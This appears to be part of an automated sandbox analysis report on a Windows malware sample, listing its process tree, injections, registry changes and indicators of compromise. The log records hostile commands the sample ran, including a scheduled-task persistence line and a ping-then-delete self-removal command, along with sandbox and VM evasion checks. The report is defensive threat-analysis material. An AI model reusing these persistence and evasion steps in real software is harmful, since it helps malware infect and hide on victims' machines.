pid pid_target Process procid_target 1164 3376 WerFault.exe 94 1488 5076 WerFault.exe 122 5280 6032 WerFault.exe 149 5324 6016 WerFault.exe 148 5868 5004 WerFault.exe 156 5672 2084 WerFault.exe 165 5492 5220 WerFault.exe 200 832 4724 WerFault.exe 105 4532 2368 WerFault.exe 117 5212 4452 WerFault.exe 212 3528 3564 WerFault.exe 252 3296 3708 WerFault.exe 259 3324 5148 WerFault.exe 277 4392 5900 WerFault.exe 282 -
NSIS installer 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023265-197.dat nsis_installer_2 behavioral2/files/0x0007000000023265-187.dat nsis_installer_2 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u2ls.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u2ls.0.exe -
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5732 schtasks.exe 2848 schtasks.exe 836 schtasks.exe 5148 schtasks.exe 5380 schtasks.exe 5176 schtasks.exe 2028 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2611 = "Bougainville Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2871 = "Magallanes Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1912 = "Russia TZ 10 Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1821 = "Russia TZ 1 Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" L7msUYWEb0w2cAnBCZdJMuLo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time" L7msUYWEb0w2cAnBCZdJMuLo.exe -
Runs ping.exe 1 TTPs 2 IoCs
pid Process 5460 PING.EXE 2848 PING.EXE -
Suspicious behavior: EnumeratesProcesses 50 IoCs
pid Process 4724 u2ls.0.exe 4724 u2ls.0.exe 2760 powershell.exe 2760 powershell.exe 216 powershell.exe 216 powershell.exe 5180 powershell.exe 5180 powershell.exe 1832 powershell.exe 1832 powershell.exe 3308 xCnC3kRGjYzKzgztZzTB60s2.exe 3308 xCnC3kRGjYzKzgztZzTB60s2.exe 3664 L7msUYWEb0w2cAnBCZdJMuLo.exe 3664 L7msUYWEb0w2cAnBCZdJMuLo.exe 1124 zFFFw4OHExPBcLGvnue2mRJZ.exe 1124 zFFFw4OHExPBcLGvnue2mRJZ.exe 5180 powershell.exe 5928 powershell.exe 5928 powershell.exe 5928 powershell.exe 4724 u2ls.0.exe 4724 u2ls.0.exe 428 wZuArslZHWkceXKudkk2iDCR.exe 428 wZuArslZHWkceXKudkk2iDCR.exe 3964 powershell.exe 3964 powershell.exe 3964 powershell.exe 6040 L7msUYWEb0w2cAnBCZdJMuLo.exe 6040 L7msUYWEb0w2cAnBCZdJMuLo.exe 6072 wZuArslZHWkceXKudkk2iDCR.exe 6072 wZuArslZHWkceXKudkk2iDCR.exe 6040 L7msUYWEb0w2cAnBCZdJMuLo.exe 6040 L7msUYWEb0w2cAnBCZdJMuLo.exe 6040 L7msUYWEb0w2cAnBCZdJMuLo.exe 6040 L7msUYWEb0w2cAnBCZdJMuLo.exe 6040 L7msUYWEb0w2cAnBCZdJMuLo.exe 6040 L7msUYWEb0w2cAnBCZdJMuLo.exe 6040 L7msUYWEb0w2cAnBCZdJMuLo.exe 6040 L7msUYWEb0w2cAnBCZdJMuLo.exe 6072 wZuArslZHWkceXKudkk2iDCR.exe 6072 wZuArslZHWkceXKudkk2iDCR.exe 1540 DGDAEHCBGI.exe 1540 DGDAEHCBGI.exe 6072 wZuArslZHWkceXKudkk2iDCR.exe 6072 wZuArslZHWkceXKudkk2iDCR.exe 6072 wZuArslZHWkceXKudkk2iDCR.exe 6072 wZuArslZHWkceXKudkk2iDCR.exe 6072 wZuArslZHWkceXKudkk2iDCR.exe 6072 wZuArslZHWkceXKudkk2iDCR.exe 1540 DGDAEHCBGI.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 2068 jsc.exe Token: SeDebugPrivilege 2760 powershell.exe Token: SeDebugPrivilege 216 powershell.exe Token: SeDebugPrivilege 1832 powershell.exe Token: SeDebugPrivilege 5180 powershell.exe Token: SeDebugPrivilege 3664 L7msUYWEb0w2cAnBCZdJMuLo.exe Token: SeDebugPrivilege 3308 xCnC3kRGjYzKzgztZzTB60s2.exe Token: SeDebugPrivilege 1124 zFFFw4OHExPBcLGvnue2mRJZ.exe Token: SeImpersonatePrivilege 3308 xCnC3kRGjYzKzgztZzTB60s2.exe Token: SeImpersonatePrivilege 3664 L7msUYWEb0w2cAnBCZdJMuLo.exe Token: SeImpersonatePrivilege 1124 zFFFw4OHExPBcLGvnue2mRJZ.exe Token: SeDebugPrivilege 5928 powershell.exe Token: SeDebugPrivilege 428 wZuArslZHWkceXKudkk2iDCR.exe Token: SeImpersonatePrivilege 428 wZuArslZHWkceXKudkk2iDCR.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeDebugPrivilege 1540 DGDAEHCBGI.exe -
Suspicious use of SetWindowsHookEx 17 IoCs
pid Process 5084 u2ls.1.exe 5076 rundll32.exe 5076 rundll32.exe 5076 rundll32.exe 5216 BroomSetup.exe 5004 rundll32.exe 5004 rundll32.exe 5004 rundll32.exe 2084 rundll32.exe 2084 rundll32.exe 2084 rundll32.exe 5220 rundll32.exe 5220 rundll32.exe 5220 rundll32.exe 4452 rundll32.exe 4452 rundll32.exe 4452 rundll32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2128 wrote to memory of 2016 2128 da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe 89 PID 2128 wrote to memory of 2016 2128 da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe 89 PID 2128 wrote to memory of 2016 2128 da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe 89 PID 2128 wrote to memory of 2376 2128 da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe 90 PID 2128 wrote to memory of 2376 2128 da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe 90 PID 2128 wrote to memory of 2376 2128 da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe 90 PID 2128 wrote to memory of 2068 2128 da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe 92 PID 2128 wrote to memory of 2068 2128 da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe 92 PID 2128 wrote to memory of 2068 2128 da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe 92 PID 2128 wrote to memory of 2068 2128 da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe 92 PID 2128 wrote to memory of 2068 2128 da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe 92 PID 2128 wrote to memory of 2068 2128 da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe 92 PID 2128 wrote to memory of 2068 2128 da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe 92 PID 2128 wrote to memory of 2068 2128 da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe 92 PID 2068 wrote to memory of 3376 2068 jsc.exe 94 PID 2068 wrote to memory of 3376 2068 jsc.exe 94 PID 2068 wrote to memory of 3376 2068 jsc.exe 94 PID 2068 wrote to memory of 4948 2068 jsc.exe 95 PID 2068 wrote to memory of 4948 2068 jsc.exe 95 PID 2068 wrote to memory of 4948 2068 jsc.exe 95 PID 4948 wrote to memory of 436 4948 BOValDiVDjiQWzr6UN6p6jA7.exe 96 PID 4948 wrote to memory of 436 4948 BOValDiVDjiQWzr6UN6p6jA7.exe 96 PID 4948 wrote to memory of 436 4948 BOValDiVDjiQWzr6UN6p6jA7.exe 96 PID 2068 wrote to memory of 428 2068 jsc.exe 97 PID 2068 wrote to memory of 428 2068 jsc.exe 97 PID 2068 wrote to memory of 428 2068 jsc.exe 97 PID 2068 wrote to memory of 1124 2068 jsc.exe 196 PID 2068 wrote to memory of 1124 2068 jsc.exe 196 PID 2068 wrote to memory of 1124 2068 jsc.exe 196 PID 2068 wrote to memory of 3308 2068 jsc.exe 99 PID 2068 wrote to memory of 3308 2068 jsc.exe 99 PID 2068 wrote to memory of 3308 2068 jsc.exe 99 PID 436 wrote to memory of 4336 436 BOValDiVDjiQWzr6UN6p6jA7.tmp 100 PID 436 wrote to memory of 4336 436 BOValDiVDjiQWzr6UN6p6jA7.tmp 100 PID 436 wrote to memory of 4336 436 BOValDiVDjiQWzr6UN6p6jA7.tmp 100 PID 2068 wrote to memory of 3664 2068 jsc.exe 225 PID 2068 wrote to memory of 3664 2068 jsc.exe 225 PID 2068 wrote to memory of 3664 2068 jsc.exe 225 PID 436 wrote to memory of 2608 436 BOValDiVDjiQWzr6UN6p6jA7.tmp 102 PID 436 wrote to memory of 2608 436 BOValDiVDjiQWzr6UN6p6jA7.tmp 102 PID 436 wrote to memory of 2608 436 BOValDiVDjiQWzr6UN6p6jA7.tmp 102 PID 2068 wrote to memory of 3636 2068 jsc.exe 104 PID 2068 wrote to memory of 3636 2068 jsc.exe 104 PID 2068 wrote to memory of 3636 2068 jsc.exe 104 PID 3376 wrote to memory of 4724 3376 UNAhnkHQ34vsYuu3ggHNYRmg.exe 105 PID 3376 wrote to memory of 4724 3376 UNAhnkHQ34vsYuu3ggHNYRmg.exe 105 PID 3376 wrote to memory of 4724 3376 UNAhnkHQ34vsYuu3ggHNYRmg.exe 105 PID 3636 wrote to memory of 4020 3636 wiv9T1pqAf4f2oHhfWycBzc5.exe 108 PID 3636 wrote to memory of 4020 3636 wiv9T1pqAf4f2oHhfWycBzc5.exe 108 PID 3636 wrote to memory of 4020 3636 wiv9T1pqAf4f2oHhfWycBzc5.exe 108 PID 3636 wrote to memory of 5028 3636 wiv9T1pqAf4f2oHhfWycBzc5.exe 109 PID 3636 wrote to memory of 5028 3636 wiv9T1pqAf4f2oHhfWycBzc5.exe 109 PID 3636 wrote to memory of 5028 3636 wiv9T1pqAf4f2oHhfWycBzc5.exe 109 PID 5028 wrote to memory of 2848 5028 cmd.exe 112 PID 5028 wrote to memory of 2848 5028 cmd.exe 112 PID 5028 wrote to memory of 2848 5028 cmd.exe 112 PID 2068 wrote to memory of 2604 2068 jsc.exe 113 PID 2068 wrote to memory of 2604 2068 jsc.exe 113 PID 2068 wrote to memory of 2604 2068 jsc.exe 113 PID 3376 wrote to memory of 5084 3376 UNAhnkHQ34vsYuu3ggHNYRmg.exe 114 PID 3376 wrote to memory of 5084 3376 UNAhnkHQ34vsYuu3ggHNYRmg.exe 114 PID 3376 wrote to memory of 5084 3376 UNAhnkHQ34vsYuu3ggHNYRmg.exe 114 PID 4020 wrote to memory of 4120 4020 wfplwfs.exe 188 PID 4020 wrote to memory of 4120 4020 wfplwfs.exe 188
Processes
-
C:\Users\Admin\AppData\Local\Temp\da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe"C:\Users\Admin\AppData\Local\Temp\da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"2⤵PID:2016
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"2⤵PID:2376
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Users\Admin\Pictures\UNAhnkHQ34vsYuu3ggHNYRmg.exe"C:\Users\Admin\Pictures\UNAhnkHQ34vsYuu3ggHNYRmg.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Users\Admin\AppData\Local\Temp\u2ls.0.exe"C:\Users\Admin\AppData\Local\Temp\u2ls.0.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4724 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\DGDAEHCBGI.exe"5⤵PID:3196
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:4988
-
-
C:\Users\Admin\AppData\Local\Temp\DGDAEHCBGI.exe"C:\Users\Admin\AppData\Local\Temp\DGDAEHCBGI.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1540 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\DGDAEHCBGI.exe7⤵PID:5472
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30008⤵
- Runs ping.exe
PID:5460
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 27765⤵
- Program crash
PID:832
-
-
-
C:\Users\Admin\AppData\Local\Temp\u2ls.1.exe"C:\Users\Admin\AppData\Local\Temp\u2ls.1.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5084 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "5⤵PID:2960
-
C:\Windows\SysWOW64\chcp.comchcp 12516⤵PID:4756
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F6⤵
- Creates scheduled task(s)
PID:5148
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3376 -s 11484⤵
- Program crash
PID:1164
-
-
-
C:\Users\Admin\Pictures\BOValDiVDjiQWzr6UN6p6jA7.exe"C:\Users\Admin\Pictures\BOValDiVDjiQWzr6UN6p6jA7.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Users\Admin\AppData\Local\Temp\is-NDRQ9.tmp\BOValDiVDjiQWzr6UN6p6jA7.tmp"C:\Users\Admin\AppData\Local\Temp\is-NDRQ9.tmp\BOValDiVDjiQWzr6UN6p6jA7.tmp" /SL5="$8022E,1634197,54272,C:\Users\Admin\Pictures\BOValDiVDjiQWzr6UN6p6jA7.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Users\Admin\AppData\Local\djEdit\djedit.exe"C:\Users\Admin\AppData\Local\djEdit\djedit.exe" -i5⤵
- Executes dropped EXE
PID:4336
-
-
C:\Users\Admin\AppData\Local\djEdit\djedit.exe"C:\Users\Admin\AppData\Local\djEdit\djedit.exe" -s5⤵
- Executes dropped EXE
PID:2608
-
-
-
-
C:\Users\Admin\Pictures\wZuArslZHWkceXKudkk2iDCR.exe"C:\Users\Admin\Pictures\wZuArslZHWkceXKudkk2iDCR.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:428 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5180
-
-
C:\Users\Admin\Pictures\wZuArslZHWkceXKudkk2iDCR.exe"C:\Users\Admin\Pictures\wZuArslZHWkceXKudkk2iDCR.exe"4⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- Suspicious behavior: EnumeratesProcesses
PID:6072 -
